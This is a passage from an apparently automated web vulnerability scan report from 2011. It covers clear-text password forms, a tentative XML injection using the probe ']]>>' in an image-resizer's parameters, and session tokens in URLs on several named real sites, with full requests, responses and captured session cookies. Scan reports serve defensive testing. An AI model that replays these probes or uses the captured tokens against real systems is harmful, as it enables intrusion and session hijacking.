Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.0.mybcdna.com
Path:	/JavaScript/apps/HomeBeforeLogin/hblv2.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js?68769

The form contains the following password field:

password

Request

GET /JavaScript/apps/HomeBeforeLogin/hblv2.js?68769 HTTP/1.1
Host: assets.0.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

6.2. http://forums.vostu.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forums.vostu.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forums.vostu.com/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET / HTTP/1.1
Host: forums.vostu.com
Proxy-Connection: keep-alive
Referer: http://www.vostu.com/en/2011/04/20/megacity-takes-brazil-by-storm/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32124601.79039334.1311275451.1311275451.1311275451.1; __utmb=32124601.9.7.1311275636343; __utmc=32124601; __utmz=32124601.1311275451.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:13:49 GMT
Server: Apache/2.2.14 (Unix) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Cache-Control: private
Pragma: private
Set-Cookie: Az_lastvisit=1311275629; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Set-Cookie: Az_lastactivity=0; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Set-Cookie: Az_languageid=2; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Set-Cookie: Az_userstyleid=8; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Content-Length: 88918
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR" id="vbullet
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="login.php?do=login" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<label for="username">
...[SNIP]...
</label>

<input id="navbar_password" type="password" value="" tabindex="102" accesskey="u" name="vb_login_password" />

</p>
...[SNIP]...

6.3. http://forums.vostu.com/forums/41-Como-Jogar previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forums.vostu.com
Path:	/forums/41-Como-Jogar

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forums.vostu.com/forums/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /forums/41-Como-Jogar HTTP/1.1
Host: forums.vostu.com
Proxy-Connection: keep-alive
Referer: http://forums.vostu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32124601.79039334.1311275451.1311275451.1311275451.1; __utmb=32124601.12.4.1311275636343; __utmc=32124601; __utmz=32124601.1311275451.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Az_lastvisit=1311275630; Az_lastactivity=0; Az_userstyleid=8; Az_languageid=2

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:14:19 GMT
Server: Apache/2.2.14 (Unix) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Cache-Control: private
Pragma: private
Set-Cookie: Az_lastactivity=0; expires=Fri, 20-Jul-2012 19:14:19 GMT; path=/
Set-Cookie: Az_forum_view=7139c26eb82c8e78808f0b999029d51072882d5ca-1-%7Bi-41_i-1311275659_%7D; path=/
Content-Length: 66284
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR" id="vbullet
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Senha" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Conectar" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profil
...[SNIP]...

6.4. http://static.curse.com/themes/common/v6/scripts/core.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.curse.com
Path:	/themes/common/v6/scripts/core.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://static.curse.com/themes/common/v6/scripts/core.js?LastChanged=634456582020000000

The form contains the following password field:

password

Request

GET /themes/common/v6/scripts/core.js?LastChanged=634456582020000000 HTTP/1.1
Host: static.curse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60480000
Content-Type: application/x-javascript
Last-Modified: Tue, 17 May 2011 16:36:49 GMT
Accept-Ranges: bytes
ETag: "80e6539eb014cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:48:22 GMT
Content-Length: 324214

/* D:\Projects\Curse\trunk\Curse.com\source\Curse.Build\..\Curse.Web\Themes\Common\v6\scripts\core\100-jquery.js */

(function(){var
window=this,undefined,_jQuery=window.jQuery,_$=window.$,jQuery=wind
...[SNIP]...
</p><form method="post" action="'+url+'"><input name="next" value="'+window.location.href+'" type="hidden" />
...[SNIP]...
</label> <input id="id_password" name="password" maxlength="30" type="password"></div>
...[SNIP]...

6.5. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boston.com
Path:	/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links

The form contains the following password field:

pass

Request

GET /lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links HTTP/1.1
Host: www.boston.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; RMFD=011QgHGVO1060Oe; __unam=b6206f2-130c7ed914a-12883c53-4; bcpage=5; _chartbeat2=2gl4d8yk23g2sl2m

Response

7. XML injection previous next
There are 2 instances of this issue:

/webservice/ImageResizer.ashx [h parameter]
/webservice/ImageResizer.ashx [w parameter]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

7.1. http://www.scmagazineus.com/webservice/ImageResizer.ashx [h parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.scmagazineus.com
Path:	/webservice/ImageResizer.ashx

Issue detail

The h parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the h parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /webservice/ImageResizer.ashx?n=http://media.scmagazineus.com/images/2011/07/01/0711_soc_177911_177914.jpg&h=244]]>>&w=436&c=1 HTTP/1.1
Host: www.scmagazineus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: ASP.NET_SessionId=lwqoj3yh0qnnva0n4ikj33sk

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/Jpeg
Expires: Fri, 22 Jul 2011 21:14:51 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:14:51 GMT
Content-Length: 141832

......JFIF.....,.,......Adobe.d....... .Exif..MM.*..... ...........z.....................................(...........1...........2...........;...........i..............In this Sept. 24, 2010, file pho
...[SNIP]...
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...

7.2. http://www.scmagazineus.com/webservice/ImageResizer.ashx [w parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.scmagazineus.com
Path:	/webservice/ImageResizer.ashx

Issue detail

The w parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the w parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /webservice/ImageResizer.ashx?n=http://media.scmagazineus.com/images/2011/07/01/0711_soc_177911_177914.jpg&h=244&w=436]]>>&c=1 HTTP/1.1
Host: www.scmagazineus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: ASP.NET_SessionId=lwqoj3yh0qnnva0n4ikj33sk

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/Jpeg
Expires: Fri, 22 Jul 2011 21:15:41 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:15:40 GMT
Content-Length: 141832

......JFIF.....,.,......Adobe.d....... .Exif..MM.*..... ...........z.....................................(...........1...........2...........;...........i..............In this Sept. 24, 2010, file pho
...[SNIP]...
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...

8. Session token in URL previous next
There are 20 instances of this issue:

http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard
http://games.myyearbook.com/
http://games.myyearbook.com/landing/pool
http://l.sharethis.com/pview
http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage
http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo
http://mt0.googleapis.com/mapslt/ft
https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx
http://www.capitalone.com/redirect.php
http://www.datacard.com/combined.js
http://www.datacard.com/id/js/libs/hoverIntent-min.js
http://www.datacard.com/id/js/libs/jquery-1.2.6.pack.js
http://www.datacard.com/id/js/libs/thickbox-compressed.js
http://www.datacard.com/id/js/search/highlight-min.js
http://www.datacard.com/id/swfobject/swfobject.js
http://www.facebook.com/extern/login_status.php
http://www.google.com/recaptcha/api/challenge
http://www.pages05.net/WTS/event.jpeg

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

8.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://assets.0.mybcdna.com
Path:	/JavaScript/apps/HomeBeforeLogin/hblv2.js

Issue detail

The response contains the following links that appear to contain session tokens:

https://h.online-metrix.net/fp/check.js?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '
https://h.online-metrix.net/fp/clear.png?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '&m=2
https://h.online-metrix.net/fp/fp.swf?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '

Request

Response

8.2. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://bostonglobe.tt.omtrdc.net
Path:	/m2/bostonglobe/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard?mboxHost=www.boston.com&mboxSession=1311428781592-195064&mboxPage=1311428781592-195064&screenHeight=1200&screenWidth=1920&browserWidth=948&browserHeight=845&browserTimeOffset=-300&colorDepth=32&mboxXDomain=enabled&mboxCount=1&mboxPageValue=0.74&pageType=Article%20Page&path=%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F&profile.userRegistered=false&user.categoryAffinity=Lifestyle&mbox=bc_globalMbox&mboxId=0&mboxTime=1311410781597&mboxURL=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&mboxReferrer=&mboxVersion=40

Request

GET /m2/bostonglobe/mbox/standard?mboxHost=www.boston.com&mboxSession=1311428781592-195064&mboxPage=1311428781592-195064&screenHeight=1200&screenWidth=1920&browserWidth=948&browserHeight=845&browserTimeOffset=-300&colorDepth=32&mboxXDomain=enabled&mboxCount=1&mboxPageValue=0.74&pageType=Article%20Page&path=%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F&profile.userRegistered=false&user.categoryAffinity=Lifestyle&mbox=bc_globalMbox&mboxId=0&mboxTime=1311410781597&mboxURL=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: bostonglobe.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311428781592-195064.17; Domain=bostonglobe.tt.omtrdc.net; Expires=Sat, 06-Aug-2011 13:48:14 GMT; Path=/m2/bostonglobe
Content-Type: text/javascript
Content-Length: 168
Date: Sat, 23 Jul 2011 13:48:13 GMT
Server: Test & Target

mboxFactories.get('default').get('bc_globalMbox',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1311428781592-195064.17");

8.3. http://games.myyearbook.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://games.myyearbook.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.myyearbook.com/?mysession=YmF0dGxlc192b3RlX2JhdHRsZQ==
http://www.myyearbook.com/?mysession=YmxvZ3NfYmxvZw==
http://www.myyearbook.com/?mysession=ZmxpcnRzX3ZpZXdGbGlydHM=
http://www.myyearbook.com/?mysession=bGlzdGluZ192aWV3X2F1dG9ncmFwaHM=
http://www.myyearbook.com/?mysession=bGlzdGluZ19ib2d1cw==
http://www.myyearbook.com/?mysession=bWFnX2luZGV4
http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPU5BTUU=
http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPUVNQUlM
http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPVlFQVJCT09L
http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QURWQU5DRUQmZmlyc3RwYWdlPXk=
http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QkFTSUMmZmlyc3RwYWdlPXk=
http://www.myyearbook.com/?mysession=c3RpY2tlcnNfdmlld2FsbHN0aWNrZXJz=
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX215cGljdHVyZXM=
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGU=
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTExMTM2MjY3
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5Nzk0MDA4
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIyMjA0NTY0
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTg5OTAzNjc=
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3doYXRldmVyaXdhbnQ=
http://www.myyearbook.com/?mysession=dmlkZW9fdXNlcg==

Request

GET / HTTP/1.1
Host: games.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; navbar-click=games

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Set-Cookie: mcim=deleted; expires=Wed, 21-Jul-2010 18:00:14 GMT; path=/; domain=.myyearbook.com
Set-Cookie: meeboCIM672=deleted; expires=Wed, 21-Nov-3010 18:00:15 GMT; path=/; domain=.myyearbook.com
Set-Cookie: navbar-click=deleted; expires=Wed, 21-Jul-2010 18:00:14 GMT; path=/; domain=.myyearbook.com
Cache-control: no-cache
Pragma: no-cache
Content-Length: 44747
Connection: close
Content-Type: text/html; charset=UTF-8;
X-MyPoolMember: 10.10.10.236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2002/REC-xhtml1-20020801/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http:/
...[SNIP]...
<li class="profileMenu" data-id="profile">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGU=">
Profile
</a>
...[SNIP]...
<li id="reportIcon" class="headerSprite" data-id="reportabuse">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ19ib2d1cw==">
Report
</a>
...[SNIP]...
<li data-id="signup">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">Sign Up</a>
...[SNIP]...
<li data-id="login"><a href="http://www.myyearbook.com//?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">Login</a>
...[SNIP]...
<li data-id="browsepeople">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QkFTSUMmZmlyc3RwYWdlPXk=">
Browse People
</a>
...[SNIP]...
<li data-id="namesearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPU5BTUU=">
Name Search
</a>
...[SNIP]...
<li data-id="emailsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPUVNQUlM">
Email Search
</a>
...[SNIP]...
<li data-id="schoolsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPVlFQVJCT09L">
School Search
</a>
...[SNIP]...
<li data-id="advancedsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QURWQU5DRUQmZmlyc3RwYWdlPXk=">
Advanced Search
</a>
...[SNIP]...
<li data-id="myphotos">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX215cGljdHVyZXM=">
My Photos
</a>
...[SNIP]...
<li data-id="myautographs">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ192aWV3X2F1dG9ncmFwaHM=">
My Autographs
</a>
...[SNIP]...
<li data-id="mystickers">
<a href="http://www.myyearbook.com/?mysession=c3RpY2tlcnNfdmlld2FsbHN0aWNrZXJz=">
My Stickers
</a>
...[SNIP]...
<li data-id="myflirts">
<a href="http://www.myyearbook.com/?mysession=ZmxpcnRzX3ZpZXdGbGlydHM=">
My Flirts
</a>
...[SNIP]...
<li data-id="whateveriwant">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3doYXRldmVyaXdhbnQ=">
Whatever I Want
</a>
...[SNIP]...
<li data-id="myvideos">
<a href="http://www.myyearbook.com/?mysession=dmlkZW9fdXNlcg==">
My Videos
</a>
...[SNIP]...
<li data-id="myblog">
<a href="http://www.myyearbook.com/?mysession=YmxvZ3NfYmxvZw==">
My Blog
</a>
...[SNIP]...
<li class="navbar_battles" data-id="battles"><a href="http://www.myyearbook.com/?mysession=YmF0dGxlc192b3RlX2JhdHRsZQ==">Battles</a></li><li class="navbar_mymag" data-id="mymag"><a href="http://www.myyearbook.com/?mysession=bWFnX2luZGV4">myMag</a>
...[SNIP]...
<div class="message">To enjoy some of the benefits of Games, you must be registered with myYearbook. Please <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">register</a> or <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">log in</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5Nzk0MDA4"><img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/02/08/15/thm_phpKdbNWy.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5Nzk0MDA4">sam sam</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTg5OTAzNjc="><img src="http://content1.myyearbook.com/thumb_userimages/mini/2009/07/07/16/thm_thm_phpUHyFBn.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTg5OTAzNjc=">Adrian,BIO,outlaw,ANR Theoret</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIyMjA0NTY0"><img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/06/29/18/thm_php2jwE4u.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIyMjA0NTY0">Liana Nicole</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTExMTM2MjY3"><img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/08/19/thm_phpNnlsgm.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTExMTM2MjY3">tera for you to ask</a>
...[SNIP]...

8.4. http://games.myyearbook.com/landing/pool previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://games.myyearbook.com
Path:	/landing/pool

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.myyearbook.com/?mysession=YmF0dGxlc192b3RlX2JhdHRsZQ==
http://www.myyearbook.com/?mysession=YmxvZ3NfYmxvZw==
http://www.myyearbook.com/?mysession=ZmxpcnRzX3ZpZXdGbGlydHM=
http://www.myyearbook.com/?mysession=bGlzdGluZ192aWV3X2F1dG9ncmFwaHM=
http://www.myyearbook.com/?mysession=bGlzdGluZ19ib2d1cw==
http://www.myyearbook.com/?mysession=bWFnX2luZGV4
http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPU5BTUU=
http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPUVNQUlM
http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPVlFQVJCT09L
